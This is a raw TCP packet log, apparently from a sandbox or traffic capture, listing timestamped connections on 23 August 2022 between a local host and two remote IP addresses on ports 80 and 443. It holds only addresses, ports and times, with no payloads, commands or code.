Aug 23, 2022 18:23:59.007968903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007987976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008582115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008600950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008618116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008630037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008630991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008647919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008670092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008676052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008692026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008698940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008735895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008742094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008755922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008784056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008785009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008790016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008822918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008831024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008842945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008855104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.008862019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008881092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.008889914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009021044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009051085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009061098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009085894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009088993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009114027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009130001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009149075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009208918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009232044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009252071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009254932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009263992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009280920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009289026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009295940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009314060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009321928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009325981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.009341955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009346962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009372950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009809017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.009968042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010004997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010061026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010067940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010075092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010117054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010137081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010224104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010241032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010267019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010278940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010293961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010323048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010463953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010481119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010493994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010497093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010509014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010514021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010540962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010562897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010840893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010859966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010876894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010889053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010905981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010915041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010921955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010938883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010945082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010950089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.010965109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010970116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.010993958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.011400938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.013837099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.013855934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.013894081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.013906956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.013914108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.013948917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.014621973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.014638901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.014656067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.014659882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.014667988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.014676094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.014697075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.014719009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041526079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041577101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041618109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041659117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041683912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041707993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041712999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041733027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041749001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041778088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041819096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041850090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041862965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041868925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041868925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041876078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041910887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041923046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041954994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.041970968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.041997910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042007923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042037964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042058945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042068005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042093992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042109013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042115927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042150974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042160034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042192936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042203903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042227030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042258024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042294025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042335033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042366982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042382956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042395115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042401075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042407036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042408943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042448997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042453051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042488098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042491913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042507887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042526007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042567015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042598009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042607069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042615891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042644024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042675972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042695999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042701006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042716980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042718887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042757988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042758942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042793989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042799950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042829990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042855978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042884111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042890072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.042912006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.042948008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043000937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043075085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043154001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043211937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043385983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043416023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043473959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043507099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043521881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043544054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043572903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.043596029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043618917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.043966055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.044003963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.044035912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.044061899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.044079065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.044116020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.044126987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.044154882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.046278954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.061592102 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:23:59.061634064 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:23:59.061719894 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:23:59.099224091 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:23:59.099258900 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:23:59.164737940 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:23:59.164911985 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:00.397744894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.432420969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524616957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524643898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524661064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524677992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524693966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524722099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524764061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524774075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524779081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524795055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524841070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524844885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524849892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524862051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524890900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.524890900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524907112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.524924994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.558691025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558718920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558741093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558763981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558788061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558815002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.558862925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.558870077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.558970928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.558994055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559016943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559031010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559040070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559047937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559062958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559065104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559081078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559102058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559113979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559122086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559161901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559201002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559217930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559223890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559241056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559252977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559266090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559268951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559289932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559290886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559313059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559324026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559343100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559379101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559391975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.559393883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559403896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.559444904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602550983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602602959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602648973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602679014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602709055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602715015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602716923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602766037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602782965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602826118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602828026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602876902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602886915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602931976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602936983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.602983952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.602992058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603040934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603043079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603100061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603106976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603153944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603162050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603214025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603219032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603267908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603271008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603312969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603323936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603390932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603406906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603463888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603476048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603504896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603516102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603544950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603554010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603595972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603601933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603657007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603667021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603723049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603785992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603786945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603806973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603846073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603847980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603893995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603903055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603935957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603941917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.603976011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.603991985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604022980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604032993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604075909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604082108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604114056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604124069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604154110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604160070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604192972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604202032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604231119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604243040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604270935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604280949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604317904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:00.604335070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:00.604362965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.340150118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.374212027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464019060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464049101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464066982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464085102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464106083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464128971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464150906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464154005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.464169025 CEST	80	49827	45.95.11.158	192.168.2.3
